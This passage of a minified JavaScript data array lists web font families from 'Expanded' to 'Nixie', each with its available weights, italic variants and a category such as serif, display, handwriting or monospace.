Expanded",v:["100","200","300",400,500,600,700,800,900],f:"sans-serif"},{n:"Engagement",v:[400],f:"handwriting"},{n:"Englebert",v:[400],f:"sans-serif"},{n:"Enriqueta",v:[400,500,600,700],f:"serif"},{n:"Ephesis",v:[400],f:"handwriting"},{n:"Epilogue",v:["100","200","300",400,500,600,700,800,900,"100i","200i","300i","400i","500i","600i","700i","800i","900i"],f:"sans-serif"},{n:"Erica One",v:[400],f:"display"},{n:"Esteban",v:[400],f:"serif"},{n:"Estonia",v:[400],f:"handwriting"},{n:"Euphoria Script",v:[400],f:"handwriting"},{n:"Ewert",v:[400],f:"display"},{n:"Exo",v:["100","200","300",400,500,600,700,800,900,"100i","200i","300i","400i","500i","600i","700i","800i","900i"],f:"sans-serif"},{n:"Exo 2",v:["100","200","300",400,500,600,700,800,900,"100i","200i","300i","400i","500i","600i","700i","800i","900i"],f:"sans-serif"},{n:"Expletus Sans",v:[400,500,600,700,"400i","500i","600i","700i"],f:"display"},{n:"Explora",v:[400],f:"handwriting"},{n:"Edu QLD Beginner",v:[400,500,600,700],f:"handwriting"},{n:"Edu SA Beginner",v:[400,500,600,700],f:"handwriting"},{n:"Edu TAS Beginner",v:[400,500,600,700],f:"handwriting"},{n:"Edu VIC WA NT Beginner",v:[400,500,600,700],f:"handwriting"},{n:"Fahkwang",v:["200","200i","300","300i",400,"400i",500,"500i",600,"600i",700,"700i"],f:"sans-serif"},{n:"Familjen Grotesk",v:[400,500,600,700,"400i","500i","600i","700i"],f:"sans-serif"},{n:"Fanwood Text",v:[400,"400i"],f:"serif"},{n:"Farro",v:["300",400,500,700],f:"sans-serif"},{n:"Farsan",v:[400],f:"display"},{n:"Fascinate",v:[400],f:"display"},{n:"Fascinate Inline",v:[400],f:"display"},{n:"Faster One",v:[400],f:"display"},{n:"Fasthand",v:[400],f:"display"},{n:"Fauna One",v:[400],f:"serif"},{n:"Faustina",v:["300",400,500,600,700,800,"300i","400i","500i","600i","700i","800i"],f:"serif"},{n:"Federant",v:[400],f:"display"},{n:"Federo",v:[400],f:"sans-serif"},{n:"Felipa",v:[400],f:"handwriting"},{n:"Fenix",v:[400],f:"serif"},{n:"Festive",v:[400],f:"handwriting"},{n:"Finger Paint",v:[400],f:"display"},{n:"Fira Code",v:["300",400,500,600,700],f:"monospace"},{n:"Fira Mono",v:[400,500,700],f:"monospace"},{n:"Fira Sans",v:["100","100i","200","200i","300","300i",400,"400i",500,"500i",600,"600i",700,"700i",800,"800i",900,"900i"],f:"sans-serif"},{n:"Fira Sans Condensed",v:["100","100i","200","200i","300","300i",400,"400i",500,"500i",600,"600i",700,"700i",800,"800i",900,"900i"],f:"sans-serif"},{n:"Fira Sans Extra Condensed",v:["100","100i","200","200i","300","300i",400,"400i",500,"500i",600,"600i",700,"700i",800,"800i",900,"900i"],f:"sans-serif"},{n:"Fjalla One",v:[400],f:"sans-serif"},{n:"Fjord One",v:[400],f:"serif"},{n:"Flamenco",v:["300",400],f:"display"},{n:"Flavors",v:[400],f:"display"},{n:"Fleur De Leah",v:[400],f:"handwriting"},{n:"Flow Block",v:[400],f:"display"},{n:"Flow Circular",v:[400],f:"display"},{n:"Flow Rounded",v:[400],f:"display"},{n:"Fondamento",v:[400,"400i"],f:"handwriting"},{n:"Fontdiner Swanky",v:[400],f:"display"},{n:"Forum",v:[400],f:"display"},{n:"Francois One",v:[400],f:"sans-serif"},{n:"Frank Ruhl Libre",v:["300",400,500,600,700,800,900],f:"serif"},{n:"Fraunces",v:["100","200","300",400,500,600,700,800,900,"100i","200i","300i","400i","500i","600i","700i","800i","900i"],f:"serif"},{n:"Freckle Face",v:[400],f:"display"},{n:"Fredericka the Great",v:[400],f:"display"},{n:"Fredoka",v:["300",400,500,600,700],f:"sans-serif"},{n:"Freehand",v:[400],f:"display"},{n:"Fresca",v:[400],f:"sans-serif"},{n:"Frijole",v:[400],f:"display"},{n:"Fruktur",v:[400,"400i"],f:"display"},{n:"Fugaz One",v:[400],f:"display"},{n:"Fuggles",v:[400],f:"handwriting"},{n:"Fuzzy Bubbles",v:[400,700],f:"handwriting"},{n:"Figtree",v:[300,400,500,600,700,800,900,"300i","400i","500i","600i","700i","800i","900i"],f:"sans-serif"},{n:"Finlandica",v:[400,500,600,700,"400i","500i","600i","700i"],f:"sans-serif"},{n:"Foldit",v:[100,200,300,400,500,600,700,800,900],f:"display"},{n:"Fragment Mono",v:[400,"400i"],f:"monospace"},{n:"GFS Didot",v:[400],f:"serif"},{n:"GFS Neohellenic",v:[400,"400i",700,"700i"],f:"sans-serif"},{n:"Gabriela",v:[400],f:"serif"},{n:"Gaegu",v:["300",400,700],f:"handwriting"},{n:"Gafata",v:[400],f:"sans-serif"},{n:"Galada",v:[400],f:"display"},{n:"Galdeano",v:[400],f:"sans-serif"},{n:"Galindo",v:[400],f:"display"},{n:"Gamja Flower",v:[400],f:"handwriting"},{n:"Gayathri",v:["100",400,700],f:"sans-serif"},{n:"Gelasio",v:[400,"400i",500,"500i",600,"600i",700,"700i"],f:"serif"},{n:"Gemunu Libre",v:["200","300",400,500,600,700,800],f:"sans-serif"},{n:"Genos",v:["100","200","300",400,500,600,700,800,900,"100i","200i","300i","400i","500i","600i","700i","800i","900i"],f:"sans-serif"},{n:"Geo",v:[400,"400i"],f:"sans-serif"},{n:"Georama",v:["100","200","300",400,500,600,700,800,900,"100i","200i","300i","400i","500i","600i","700i","800i","900i"],f:"sans-serif"},{n:"Geostar",v:[400],f:"display"},{n:"Geostar Fill",v:[400],f:"display"},{n:"Germania One",v:[400],f:"display"},{n:"Gideon Roman",v:[400],f:"display"},{n:"Gidugu",v:[400],f:"sans-serif"},{n:"Gilda Display",v:[400],f:"serif"},{n:"Girassol",v:[400],f:"display"},{n:"Give You Glory",v:[400],f:"handwriting"},{n:"Glass Antiqua",v:[400],f:"display"},{n:"Glegoo",v:[400,700],f:"serif"},{n:"Gloria Hallelujah",v:[400],f:"handwriting"},{n:"Glory",v:["100","200","300",400,500,600,700,800,"100i","200i","300i","400i","500i","600i","700i","800i"],f:"sans-serif"},{n:"Gluten",v:["100","200","300",400,500,600,700,800,900],f:"display"},{n:"Goblin One",v:[400],f:"display"},{n:"Gochi Hand",v:[400],f:"handwriting"},{n:"Goldman",v:[400,700],f:"display"},{n:"Gorditas",v:[400,700],f:"display"},{n:"Gothic A1",v:["100","200","300",400,500,600,700,800,900],f:"sans-serif"},{n:"Gotu",v:[400],f:"sans-serif"},{n:"Goudy Bookletter 1911",v:[400],f:"serif"},{n:"Gowun Batang",v:[400,700],f:"serif"},{n:"Gowun Dodum",v:[400],f:"sans-serif"},{n:"Graduate",v:[400],f:"display"},{n:"Grand Hotel",v:[400],f:"handwriting"},{n:"Grandstander",v:["100","200","300",400,500,600,700,800,900,"100i","200i","300i","400i","500i","600i","700i","800i","900i"],f:"display"},{n:"Grape Nuts",v:[400],f:"handwriting"},{n:"Gravitas One",v:[400],f:"display"},{n:"Great Vibes",v:[400],f:"handwriting"},{n:"Grechen Fuemen",v:[400],f:"handwriting"},{n:"Grenze",v:["100","100i","200","200i","300","300i",400,"400i",500,"500i",600,"600i",700,"700i",800,"800i",900,"900i"],f:"serif"},{n:"Grenze Gotisch",v:["100","200","300",400,500,600,700,800,900],f:"display"},{n:"Grey Qo",v:[400],f:"handwriting"},{n:"Griffy",v:[400],f:"display"},{n:"Gruppo",v:[400],f:"sans-serif"},{n:"Gudea",v:[400,"400i",700],f:"sans-serif"},{n:"Gugi",v:[400],f:"display"},{n:"Gupter",v:[400,500,700],f:"serif"},{n:"Gurajada",v:[400],f:"serif"},{n:"Gwendolyn",v:[400,700],f:"handwriting"},{n:"Gajraj One",v:[400],f:"display"},{n:"Gantari",v:[100,200,300,400,500,600,700,800,900,"100i","200i","300i","400i","500i","600i","700i","800i","900i"],f:"sans-serif"},{n:"Gloock",v:[400],f:"serif"},{n:"Golos Text",v:[400,500,600,700,800,900],f:"sans-serif"},{n:"Gulzar",v:[400],f:"serif"},{n:"Gentium Book Plus",v:[400,"400i",700,"700i"],f:"serif"},{n:"Gentium Plus",v:[400,"400i",700,"700i"],f:"serif"},{n:"Habibi",v:[400],f:"serif"},{n:"Hachi Maru Pop",v:[400],f:"handwriting"},{n:"Hahmlet",v:["100","200","300",400,500,600,700,800,900],f:"serif"},{n:"Halant",v:["300",400,500,600,700],f:"serif"},{n:"Hammersmith One",v:[400],f:"sans-serif"},{n:"Hanalei",v:[400],f:"display"},{n:"Hanalei Fill",v:[400],f:"display"},{n:"Handlee",v:[400],f:"handwriting"},{n:"Hanuman",v:["100","300",400,700,900],f:"serif"},{n:"Happy Monkey",v:[400],f:"display"},{n:"Harmattan",v:[400,500,600,700],f:"sans-serif"},{n:"Headland One",v:[400],f:"serif"},{n:"Heebo",v:["100","200","300",400,500,600,700,800,900],f:"sans-serif"},{n:"Henny Penny",v:[400],f:"display"},{n:"Hepta Slab",v:["100","200","300",400,500,600,700,800,900],f:"serif"},{n:"Herr Von Muellerhoff",v:[400],f:"handwriting"},{n:"Hi Melody",v:[400],f:"handwriting"},{n:"Hina Mincho",v:[400],f:"serif"},{n:"Hind",v:["300",400,500,600,700],f:"sans-serif"},{n:"Hind Guntur",v:["300",400,500,600,700],f:"sans-serif"},{n:"Hind Madurai",v:["300",400,500,600,700],f:"sans-serif"},{n:"Hind Siliguri",v:["300",400,500,600,700],f:"sans-serif"},{n:"Hind Vadodara",v:["300",400,500,600,700],f:"sans-serif"},{n:"Holtwood One SC",v:[400],f:"serif"},{n:"Homemade Apple",v:[400],f:"handwriting"},{n:"Homenaje",v:[400],f:"sans-serif"},{n:"Hubballi",v:[400],f:"display"},{n:"Hurricane",v:[400],f:"handwriting"},{n:"Hanken Grotesk",v:[100,200,300,400,500,600,700,800,900,"100i","200i","300i","400i","500i","600i","700i","800i","900i"],f:"sans-serif"},{n:"IBM Plex Mono",v:["100","100i","200","200i","300","300i",400,"400i",500,"500i",600,"600i",700,"700i"],f:"monospace"},{n:"IBM Plex Sans",v:["100","100i","200","200i","300","300i",400,"400i",500,"500i",600,"600i",700,"700i"],f:"sans-serif"},{n:"IBM Plex Sans Arabic",v:["100","200","300",400,500,600,700],f:"sans-serif"},{n:"IBM Plex Sans Condensed",v:["100","100i","200","200i","300","300i",400,"400i",500,"500i",600,"600i",700,"700i"],f:"sans-serif"},{n:"IBM Plex Sans Devanagari",v:["100","200","300",400,500,600,700],f:"sans-serif"},{n:"IBM Plex Sans Hebrew",v:["100","200","300",400,500,600,700],f:"sans-serif"},{n:"IBM Plex Sans KR",v:["100","200","300",400,500,600,700],f:"sans-serif"},{n:"IBM Plex Sans Thai",v:["100","200","300",400,500,600,700],f:"sans-serif"},{n:"IBM Plex Sans Thai Looped",v:["100","200","300",400,500,600,700],f:"sans-serif"},{n:"IBM Plex Serif",v:["100","100i","200","200i","300","300i",400,"400i",500,"500i",600,"600i",700,"700i"],f:"serif"},{n:"IM Fell DW Pica",v:[400,"400i"],f:"serif"},{n:"IM Fell DW Pica SC",v:[400],f:"serif"},{n:"IM Fell Double Pica",v:[400,"400i"],f:"serif"},{n:"IM Fell Double Pica SC",v:[400],f:"serif"},{n:"IM Fell English",v:[400,"400i"],f:"serif"},{n:"IM Fell English SC",v:[400],f:"serif"},{n:"IM Fell French Canon",v:[400,"400i"],f:"serif"},{n:"IM Fell French Canon SC",v:[400],f:"serif"},{n:"IM Fell Great Primer",v:[400,"400i"],f:"serif"},{n:"IM Fell Great Primer SC",v:[400],f:"serif"},{n:"Ibarra Real Nova",v:[400,500,600,700,"400i","500i","600i","700i"],f:"serif"},{n:"Iceberg",v:[400],f:"display"},{n:"Iceland",v:[400],f:"display"},{n:"Imbue",v:["100","200","300",400,500,600,700,800,900],f:"serif"},{n:"Imperial Script",v:[400],f:"handwriting"},{n:"Imprima",v:[400],f:"sans-serif"},{n:"Inconsolata",v:["200","300",400,500,600,700,800,900],f:"monospace"},{n:"Inder",v:[400],f:"sans-serif"},{n:"Indie Flower",v:[400],f:"handwriting"},{n:"Ingrid Darling",v:[400],f:"handwriting"},{n:"Inika",v:[400,700],f:"serif"},{n:"Inknut Antiqua",v:["300",400,500,600,700,800,900],f:"serif"},{n:"Inria Sans",v:["300","300i",400,"400i",700,"700i"],f:"sans-serif"},{n:"Inria Serif",v:["300","300i",400,"400i",700,"700i"],f:"serif"},{n:"Inspiration",v:[400],f:"handwriting"},{n:"Inter",v:["100","200","300",400,500,600,700,800,900],f:"sans-serif"},{n:"Irish Grover",v:[400],f:"display"},{n:"Island Moments",v:[400],f:"handwriting"},{n:"Istok Web",v:[400,"400i",700,"700i"],f:"sans-serif"},{n:"Italiana",v:[400],f:"serif"},{n:"Italianno",v:[400],f:"handwriting"},{n:"Itim",v:[400],f:"handwriting"},{n:"IBM Plex Sans JP",v:[100,200,300,400,500,600,700],f:"sans-serif"},{n:"Instrument Sans",v:[400,500,600,700,"400i","500i","600i","700i"],f:"sans-serif"},{n:"Instrument Serif",v:[400,"400i"],f:"serif"},{n:"Inter Tight",v:[100,200,300,400,500,600,700,800,900,"100i","200i","300i","400i","500i","600i","700i","800i","900i"],f:"sans-serif"},{n:"Jacques Francois",v:[400],f:"serif"},{n:"Jacques Francois Shadow",v:[400],f:"display"},{n:"Jaldi",v:[400,700],f:"sans-serif"},{n:"JetBrains Mono",v:["100","200","300",400,500,600,700,800,"100i","200i","300i","400i","500i","600i","700i","800i"],f:"monospace"},{n:"Jim Nightshade",v:[400],f:"handwriting"},{n:"Jockey One",v:[400],f:"sans-serif"},{n:"Jolly Lodger",v:[400],f:"display"},{n:"Jomhuria",v:[400],f:"display"},{n:"Jomolhari",v:[400],f:"serif"},{n:"Josefin Sans",v:["100","200","300",400,500,600,700,"100i","200i","300i","400i","500i","600i","700i"],f:"sans-serif"},{n:"Josefin Slab",v:["100","200","300",400,500,600,700,"100i","200i","300i","400i","500i","600i","700i"],f:"serif"},{n:"Jost",v:["100","200","300",400,500,600,700,800,900,"100i","200i","300i","400i","500i","600i","700i","800i","900i"],f:"sans-serif"},{n:"Joti One",v:[400],f:"display"},{n:"Jua",v:[400],f:"sans-serif"},{n:"Judson",v:[400,"400i",700],f:"serif"},{n:"Julee",v:[400],f:"handwriting"},{n:"Julius Sans One",v:[400],f:"sans-serif"},{n:"Junge",v:[400],f:"serif"},{n:"Jura",v:["300",400,500,600,700],f:"sans-serif"},{n:"Just Another Hand",v:[400],f:"handwriting"},{n:"Just Me Again Down Here",v:[400],f:"handwriting"},{n:"K2D",v:["100","100i","200","200i","300","300i",400,"400i",500,"500i",600,"600i",700,"700i",800,"800i"],f:"sans-serif"},{n:"Joan",v:[400],f:"serif"},{n:"Kadwa",v:[400,700],f:"serif"},{n:"Kaisei Decol",v:[400,500,700],f:"serif"},{n:"Kaisei HarunoUmi",v:[400,500,700],f:"serif"},{n:"Kaisei Opti",v:[400,500,700],f:"serif"},{n:"Kaisei Tokumin",v:[400,500,700,800],f:"serif"},{n:"Kalam",v:["300",400,700],f:"handwriting"},{n:"Kameron",v:[400,700],f:"serif"},{n:"Kanit",v:["100","100i","200","200i","300","300i",400,"400i",500,"500i",600,"600i",700,"700i",800,"800i",900,"900i"],f:"sans-serif"},{n:"Karantina",v:["300",400,700],f:"display"},{n:"Karla",v:["200","300",400,500,600,700,800,"200i","300i","400i","500i","600i","700i","800i"],f:"sans-serif"},{n:"Karma",v:["300",400,500,600,700],f:"serif"},{n:"Katibeh",v:[400],f:"display"},{n:"Kaushan Script",v:[400],f:"handwriting"},{n:"Kavivanar",v:[400],f:"handwriting"},{n:"Kavoon",v:[400],f:"display"},{n:"Keania One",v:[400],f:"display"},{n:"Kelly Slab",v:[400],f:"display"},{n:"Kenia",v:[400],f:"display"},{n:"Khand",v:["300",400,500,600,700],f:"sans-serif"},{n:"Khmer",v:[400],f:"display"},{n:"Khula",v:["300",400,600,700,800],f:"sans-serif"},{n:"Kings",v:[400],f:"handwriting"},{n:"Kirang Haerang",v:[400],f:"display"},{n:"Kite One",v:[400],f:"sans-serif"},{n:"Kiwi Maru",v:["300",400,500],f:"serif"},{n:"Klee One",v:[400,600],f:"handwriting"},{n:"Knewave",v:[400],f:"display"},{n:"KoHo",v:["200","200i","300","300i",400,"400i",500,"500i",600,"600i",700,"700i"],f:"sans-serif"},{n:"Kodchasan",v:["200","200i","300","300i",400,"400i",500,"500i",600,"600i",700,"700i"],f:"sans-serif"},{n:"Koh Santepheap",v:["100","300",400,700,900],f:"display"},{n:"Kolker Brush",v:[400],f:"handwriting"},{n:"Kosugi",v:[400],f:"sans-serif"},{n:"Kosugi Maru",v:[400],f:"sans-serif"},{n:"Kotta One",v:[400],f:"serif"},{n:"Koulen",v:[400],f:"display"},{n:"Kranky",v:[400],f:"display"},{n:"Kreon",v:["300",400,500,600,700],f:"serif"},{n:"Kristi",v:[400],f:"handwriting"},{n:"Krona One",v:[400],f:"sans-serif"},{n:"Krub",v:["200","200i","300","300i",400,"400i",500,"500i",600,"600i",700,"700i"],f:"sans-serif"},{n:"Kufam",v:[400,500,600,700,800,900,"400i","500i","600i","700i","800i","900i"],f:"sans-serif"},{n:"Kulim Park",v:["200","200i","300","300i",400,"400i",600,"600i",700,"700i"],f:"sans-serif"},{n:"Kumar One",v:[400],f:"display"},{n:"Kumar One Outline",v:[400],f:"display"},{n:"Kumbh Sans",v:["100","200","300",400,500,600,700,800,900],f:"sans-serif"},{n:"Kurale",v:[400],f:"serif"},{n:"Kantumruy Pro",v:[100,200,300,400,500,600,700,"100i","200i","300i","400i","500i","600i","700i"],f:"sans-serif"},{n:"Kdam Thmor Pro",v:[400],f:"sans-serif"},{n:"Konkhmer Sleokchher",v:[400],f:"display"},{n:"La Belle Aurore",v:[400],f:"handwriting"},{n:"Lacquer",v:[400],f:"display"},{n:"Laila",v:["300",400,500,600,700],f:"sans-serif"},{n:"Lakki Reddy",v:[400],f:"handwriting"},{n:"Lalezar",v:[400],f:"display"},{n:"Lancelot",v:[400],f:"display"},{n:"Langar",v:[400],f:"display"},{n:"Lateef",v:[200,300,400,500,600,700,800],f:"handwriting"},{n:"Lato",v:["100","100i","300","300i",400,"400i",700,"700i",900,"900i"],f:"sans-serif"},{n:"Lavishly Yours",v:[400],f:"handwriting"},{n:"League Gothic",v:[400],f:"sans-serif"},{n:"League Script",v:[400],f:"handwriting"},{n:"League Spartan",v:["100","200","300",400,500,600,700,800,900],f:"sans-serif"},{n:"Leckerli One",v:[400],f:"handwriting"},{n:"Ledger",v:[400],f:"serif"},{n:"Lekton",v:[400,"400i",700],f:"sans-serif"},{n:"Lemon",v:[400],f:"display"},{n:"Lemonada",v:["300",400,500,600,700],f:"display"},{n:"Lexend",v:["100","200","300",400,500,600,700,800,900],f:"sans-serif"},{n:"Lexend Deca",v:["100","200","300",400,500,600,700,800,900],f:"sans-serif"},{n:"Lexend Exa",v:["100","200","300",400,500,600,700,800,900],f:"sans-serif"},{n:"Lexend Giga",v:["100","200","300",400,500,600,700,800,900],f:"sans-serif"},{n:"Lexend Mega",v:["100","200","300",400,500,600,700,800,900],f:"sans-serif"},{n:"Lexend Peta",v:["100","200","300",400,500,600,700,800,900],f:"sans-serif"},{n:"Lexend Tera",v:["100","200","300",400,500,600,700,800,900],f:"sans-serif"},{n:"Lexend Zetta",v:["100","200","300",400,500,600,700,800,900],f:"sans-serif"},{n:"Libre Barcode 128",v:[400],f:"display"},{n:"Libre Barcode 128 Text",v:[400],f:"display"},{n:"Libre Barcode 39",v:[400],f:"display"},{n:"Libre Barcode 39 Extended",v:[400],f:"display"},{n:"Libre Barcode 39 Extended Text",v:[400],f:"display"},{n:"Libre Barcode 39 Text",v:[400],f:"display"},{n:"Libre Barcode EAN13 Text",v:[400],f:"display"},{n:"Libre Baskerville",v:[400,"400i",700],f:"serif"},{n:"Libre Bodoni",v:[400,500,600,700,"400i","500i","600i","700i"],f:"serif"},{n:"Libre Caslon Display",v:[400],f:"serif"},{n:"Libre Caslon Text",v:[400,"400i",700],f:"serif"},{n:"Libre Franklin",v:["100","200","300",400,500,600,700,800,900,"100i","200i","300i","400i","500i","600i","700i","800i","900i"],f:"sans-serif"},{n:"Licorice",v:[400],f:"handwriting"},{n:"Life Savers",v:[400,700,800],f:"display"},{n:"Lilita One",v:[400],f:"display"},{n:"Lily Script One",v:[400],f:"display"},{n:"Limelight",v:[400],f:"display"},{n:"Linden Hill",v:[400,"400i"],f:"serif"},{n:"Literata",v:["200","300",400,500,600,700,800,900,"200i","300i","400i","500i","600i","700i","800i","900i"],f:"serif"},{n:"Liu Jian Mao Cao",v:[400],f:"handwriting"},{n:"Livvic",v:["100","100i","200","200i","300","300i",400,"400i",500,"500i",600,"600i",700,"700i",900,"900i"],f:"sans-serif"},{n:"Lobster",v:[400],f:"display"},{n:"Lobster Two",v:[400,"400i",700,"700i"],f:"display"},{n:"Londrina Outline",v:[400],f:"display"},{n:"Londrina Shadow",v:[400],f:"display"},{n:"Londrina Sketch",v:[400],f:"display"},{n:"Londrina Solid",v:["100","300",400,900],f:"display"},{n:"Long Cang",v:[400],f:"handwriting"},{n:"Lora",v:[400,500,600,700,"400i","500i","600i","700i"],f:"serif"},{n:"Love Light",v:[400],f:"handwriting"},{n:"Love Ya Like A Sister",v:[400],f:"display"},{n:"Loved by the King",v:[400],f:"handwriting"},{n:"Lovers Quarrel",v:[400],f:"handwriting"},{n:"Luckiest Guy",v:[400],f:"display"},{n:"Lusitana",v:[400,700],f:"serif"},{n:"Lustria",v:[400],f:"serif"},{n:"Luxurious Roman",v:[400],f:"display"},{n:"Luxurious Script",v:[400],f:"handwriting"},{n:"Labrada",v:[100,200,300,400,500,600,700,800,900,"100i","200i","300i","400i","500i","600i","700i","800i","900i"],f:"serif"},{n:"M PLUS 1",v:["100","200","300",400,500,600,700,800,900],f:"sans-serif"},{n:"M PLUS 1 Code",v:["100","200","300",400,500,600,700],f:"sans-serif"},{n:"M PLUS 1p",v:["100","300",400,500,700,800,900],f:"sans-serif"},{n:"M PLUS 2",v:["100","200","300",400,500,600,700,800,900],f:"sans-serif"},{n:"M PLUS Code Latin",v:["100","200","300",400,500,600,700],f:"sans-serif"},{n:"M PLUS Rounded 1c",v:["100","300",400,500,700,800,900],f:"sans-serif"},{n:"Ma Shan Zheng",v:[400],f:"handwriting"},{n:"Macondo",v:[400],f:"display"},{n:"Macondo Swash Caps",v:[400],f:"display"},{n:"Mada",v:["200","300",400,500,600,700,800,900],f:"sans-serif"},{n:"Magra",v:[400,700],f:"sans-serif"},{n:"Maiden Orange",v:[400],f:"display"},{n:"Maitree",v:["200","300",400,500,600,700],f:"serif"},{n:"Major Mono Display",v:[400],f:"monospace"},{n:"Mako",v:[400],f:"sans-serif"},{n:"Mali",v:["200","200i","300","300i",400,"400i",500,"500i",600,"600i",700,"700i"],f:"handwriting"},{n:"Mallanna",v:[400],f:"sans-serif"},{n:"Mandali",v:[400],f:"sans-serif"},{n:"Manjari",v:["100",400,700],f:"sans-serif"},{n:"Manrope",v:["200","300",400,500,600,700,800],f:"sans-serif"},{n:"Mansalva",v:[400],f:"handwriting"},{n:"Manuale",v:["300",400,500,600,700,800,"300i","400i","500i","600i","700i","800i"],f:"serif"},{n:"Marcellus",v:[400],f:"serif"},{n:"Marcellus SC",v:[400],f:"serif"},{n:"Marck Script",v:[400],f:"handwriting"},{n:"Margarine",v:[400],f:"display"},{n:"Markazi Text",v:[400,500,600,700],f:"serif"},{n:"Marko One",v:[400],f:"serif"},{n:"Marmelad",v:[400],f:"sans-serif"},{n:"Martel",v:["200","300",400,600,700,800,900],f:"serif"},{n:"Martel Sans",v:["200","300",400,600,700,800,900],f:"sans-serif"},{n:"Marvel",v:[400,"400i",700,"700i"],f:"sans-serif"},{n:"Mate",v:[400,"400i"],f:"serif"},{n:"Mate SC",v:[400],f:"serif"},{n:"Maven Pro",v:[400,500,600,700,800,900],f:"sans-serif"},{n:"McLaren",v:[400],f:"display"},{n:"Mea Culpa",v:[400],f:"handwriting"},{n:"Meddon",v:[400],f:"handwriting"},{n:"MedievalSharp",v:[400],f:"display"},{n:"Medula One",v:[400],f:"display"},{n:"Meera Inimai",v:[400],f:"sans-serif"},{n:"Megrim",v:[400],f:"display"},{n:"Meie Script",v:[400],f:"handwriting"},{n:"Meow Script",v:[400],f:"handwriting"},{n:"Merienda",v:[300,400,500,600,700,800,900],f:"handwriting"},{n:"Merriweather",v:["300","300i",400,"400i",700,"700i",900,"900i"],f:"serif"},{n:"Merriweather Sans",v:["300",400,500,600,700,800,"300i","400i","500i","600i","700i","800i"],f:"sans-serif"},{n:"Metal",v:[400],f:"display"},{n:"Metal Mania",v:[400],f:"display"},{n:"Metamorphous",v:[400],f:"display"},{n:"Metrophobic",v:[400],f:"sans-serif"},{n:"Michroma",v:[400],f:"sans-serif"},{n:"Milonga",v:[400],f:"display"},{n:"Miltonian",v:[400],f:"display"},{n:"Miltonian Tattoo",v:[400],f:"display"},{n:"Mina",v:[400,700],f:"sans-serif"},{n:"Miniver",v:[400],f:"display"},{n:"Miriam Libre",v:[400,700],f:"sans-serif"},{n:"Mirza",v:[400,500,600,700],f:"display"},{n:"Miss Fajardose",v:[400],f:"handwriting"},{n:"Mitr",v:["200","300",400,500,600,700],f:"sans-serif"},{n:"Mochiy Pop One",v:[400],f:"sans-serif"},{n:"Mochiy Pop P One",v:[400],f:"sans-serif"},{n:"Modak",v:[400],f:"display"},{n:"Modern Antiqua",v:[400],f:"display"},{n:"Mogra",v:[400],f:"display"},{n:"Mohave",v:["300",400,500,600,700,"300i","400i","500i","600i","700i"],f:"sans-serif"},{n:"Molengo",v:[400],f:"sans-serif"},{n:"Molle",v:["400i"],f:"handwriting"},{n:"Monda",v:[400,700],f:"sans-serif"},{n:"Monofett",v:[400],f:"monospace"},{n:"Monoton",v:[400],f:"display"},{n:"Monsieur La Doulaise",v:[400],f:"handwriting"},{n:"Montaga",v:[400],f:"serif"},{n:"Montagu Slab",v:["100","200","300",400,500,600,700],f:"serif"},{n:"MonteCarlo",v:[400],f:"handwriting"},{n:"Montez",v:[400],f:"handwriting"},{n:"Montserrat",v:["100","200","300",400,500,600,700,800,900,"100i","200i","300i","400i","500i","600i","700i","800i","900i"],f:"sans-serif"},{n:"Montserrat Alternates",v:["100","100i","200","200i","300","300i",400,"400i",500,"500i",600,"600i",700,"700i",800,"800i",900,"900i"],f:"sans-serif"},{n:"Montserrat Subrayada",v:[400,700],f:"sans-serif"},{n:"Moo Lah Lah",v:[400],f:"display"},{n:"Moon Dance",v:[400],f:"handwriting"},{n:"Moul",v:[400],f:"display"},{n:"Moulpali",v:[400],f:"display"},{n:"Mountains of Christmas",v:[400,700],f:"display"},{n:"Mouse Memoirs",v:[400],f:"sans-serif"},{n:"Mr Bedfort",v:[400],f:"handwriting"},{n:"Mr Dafoe",v:[400],f:"handwriting"},{n:"Mr De Haviland",v:[400],f:"handwriting"},{n:"Mrs Saint Delafield",v:[400],f:"handwriting"},{n:"Mrs Sheppards",v:[400],f:"handwriting"},{n:"Ms Madi",v:[400],f:"handwriting"},{n:"Mukta",v:["200","300",400,500,600,700,800],f:"sans-serif"},{n:"Mukta Mahee",v:["200","300",400,500,600,700,800],f:"sans-serif"},{n:"Mukta Malar",v:["200","300",400,500,600,700,800],f:"sans-serif"},{n:"Mukta Vaani",v:["200","300",400,500,600,700,800],f:"sans-serif"},{n:"Mulish",v:["200","300",400,500,600,700,800,900,"200i","300i","400i","500i","600i","700i","800i","900i"],f:"sans-serif"},{n:"Murecho",v:["100","200","300",400,500,600,700,800,900],f:"sans-serif"},{n:"MuseoModerno",v:[100,200,300,400,500,600,700,800,900,"100i","200i","300i","400i","500i","600i","700i","800i","900i"],f:"display"},{n:"My Soul",v:[400],f:"handwriting"},{n:"Mystery Quest",v:[400],f:"display"},{n:"Marhey",v:[300,400,500,600,700],f:"display"},{n:"Martian Mono",v:[100,200,300,400,500,600,700,800],f:"monospace"},{n:"Material Icons",v:[400],f:"monospace"},{n:"Material Icons Outlined",v:[400],f:"monospace"},{n:"Material Icons Round",v:[400],f:"monospace"},{n:"Material Icons Sharp",v:[400],f:"monospace"},{n:"Material Icons Two Tone",v:[400],f:"monospace"},{n:"Material Symbols Outlined",v:[100,200,300,400,500,600,700],f:"monospace"},{n:"Material Symbols Rounded",v:[100,200,300,400,500,600,700],f:"monospace"},{n:"Material Symbols Sharp",v:[100,200,300,400,500,600,700],f:"monospace"},{n:"Mingzat",v:[400],f:"sans-serif"},{n:"Monomaniac One",v:[400],f:"sans-serif"},{n:"Mynerve",v:[400],f:"handwriting"},{n:"NTR",v:[400],f:"sans-serif"},{n:"Nanum Brush Script",v:[400],f:"handwriting"},{n:"Nanum Gothic",v:[400,700,800],f:"sans-serif"},{n:"Nanum Gothic Coding",v:[400,700],f:"monospace"},{n:"Nanum Myeongjo",v:[400,700,800],f:"serif"},{n:"Nanum Pen Script",v:[400],f:"handwriting"},{n:"Neonderthaw",v:[400],f:"handwriting"},{n:"Nerko One",v:[400],f:"handwriting"},{n:"Neucha",v:[400],f:"handwriting"},{n:"Neuton",v:["200","300",400,"400i",700,800],f:"serif"},{n:"New Rocker",v:[400],f:"display"},{n:"New Tegomin",v:[400],f:"serif"},{n:"News Cycle",v:[400,700],f:"sans-serif"},{n:"Newsreader",v:["200","300",400,500,600,700,800,"200i","300i","400i","500i","600i","700i","800i"],f:"serif"},{n:"Niconne",v:[400],f:"handwriting"},{n:"Niramit",v:["200","200i","300","300i",400,"400i",500,"500i",600,"600i",700,"700i"],f:"sans-serif"},{n:"Nixie 